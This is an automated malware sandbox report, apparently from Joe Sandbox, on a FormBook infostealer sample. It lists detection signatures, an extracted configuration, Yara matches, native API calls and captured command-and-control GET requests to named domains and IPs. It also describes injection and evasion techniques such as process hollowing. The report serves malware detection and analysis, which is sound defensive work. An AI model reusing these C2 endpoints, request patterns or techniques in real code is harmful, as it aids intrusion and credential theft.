Analysis Report bXFjrxjRlb.exe

Overview

General Information

Sample Name:	bXFjrxjRlb.exe
Analysis ID:	344520
MD5:	4a595c5540f0a097a5f11159cdf5c015
SHA1:	9bd00bf1ffbdf53c841cd8d8b0a4244fdb7ba583
SHA256:	d6c54588834faae60153c6a2e7318a7e9f243b9dbfbd6e0fc44d45f4d55c9fcf
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Allocates memory in foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x99c2", "KEY1_OFFSET 0x1e39e", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1e4a9", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1cfb3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x369b5b11", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121a0", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for submitted file

Source: bXFjrxjRlb.exe	Virustotal: Detection: 27%			Perma Link
Source: bXFjrxjRlb.exe	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: bXFjrxjRlb.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 1.2.AddInProcess32.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: bXFjrxjRlb.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: bXFjrxjRlb.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Binary contains paths to debug symbols

Source:	Binary string: cscript.pdbUGP source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: AddInProcess32.pdb source: AddInProcess32.exe, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, cscript.exe
Source:	Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000002.402103553.00000000009E2000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: cscript.pdb source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_069C6750
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_069C7490
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_069C7490
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_069C8308
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov esp, ebp	0_2_069CDED8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then jmp 069C2766h	0_2_069C1F91
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_069C7484
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_069C7484
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then xor edx, edx	0_2_069C73BC
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then xor edx, edx	0_2_069C73C8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_069C83E8
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_069C7170
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_069C7170
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_069C7164
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_069C7164
Source: C:\Users\user\Desktop\bXFjrxjRlb.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_069C6C8C

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 198.54.117.215:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 198.54.117.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49758 -> 198.54.117.215:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 162.241.30.16:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 162.241.30.16:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 162.241.30.16:80

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV HTTP/1.1Host: www.what3emoji.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV HTTP/1.1Host: www.thehostingroad.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV HTTP/1.1Host: www.inifinityapps.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180
Source: Joe Sandbox View	IP Address: 198.54.117.215 198.54.117.215

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=m4Qmgz02ndzlkmzRdXbnUnIUoJvahqq5/3ILTCGwMTubC4gHDN74yJVcJDUGCd+LoHuKsTQ0JA==&W6=jnKpRl-xV HTTP/1.1Host: www.what3emoji.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE+hPHZakSNaciRtP7EZ8w/BzDNNldYjt/uExn0X1icGC4Ug==&W6=jnKpRl-xV HTTP/1.1Host: www.thehostingroad.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bf3/?pPX=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2hInTt8ZuQ329MgbQ==&W6=jnKpRl-xV HTTP/1.1Host: www.inifinityapps.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.what3emoji.com

Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: bXFjrxjRlb.exe, 00000000.00000003.349237983.000000000802D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsofB
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: bXFjrxjRlb.exe, 00000000.00000003.355490056.0000000008402000.00000004.00000001.sdmp, bXFjrxjRlb.exe, 00000000.00000003.341220156.00000000083F1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: bXFjrxjRlb.exe, 00000000.00000002.356197969.000000000254F000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: cscript.exe, 00000007.00000002.702464960.000000000518F000.00000004.00000001.sdmp	String found in binary or memory: http://www.thehostingroad.com/cgi-sys/suspendedpage.cgi?pPX=l8I6XPguYKFPGKeVh8gT1y9i2fKE
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.386826331.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: bXFjrxjRlb.exe, 00000000.00000002.356057420.000000000096F000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: bXFjrxjRlb.exe, 00000000.00000002.356178733.0000000002521000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.comT

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: bXFjrxjRlb.exe, 00000000.00000002.355982660.00000000008CB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419D70 NtCreateFile,	1_2_00419D70
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419E20 NtReadFile,	1_2_00419E20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419EA0 NtClose,	1_2_00419EA0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419F50 NtAllocateVirtualMemory,	1_2_00419F50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_00419E1A NtReadFile,	1_2_00419E1A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01379910
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379540 NtReadFile,LdrInitializeThunk,	1_2_01379540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013799A0 NtCreateSection,LdrInitializeThunk,	1_2_013799A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013795D0 NtClose,LdrInitializeThunk,	1_2_013795D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01379860
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379840 NtDelayExecution,LdrInitializeThunk,	1_2_01379840
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013798F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_013798F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01379710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013797A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_013797A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01379780
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A20 NtResumeThread,LdrInitializeThunk,	1_2_01379A20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01379A00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01379660
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379A50 NtCreateFile,LdrInitializeThunk,	1_2_01379A50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013796E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_013796E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_0137AD30 NtSetContextThread,	1_2_0137AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379520 NtWaitForSingleObject,	1_2_01379520
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379560 NtWriteFile,	1_2_01379560
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_01379950 NtQueueApcThread,	1_2_01379950
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 1_2_013795F0 NtQueryInformationFile,	1_2_013795F0
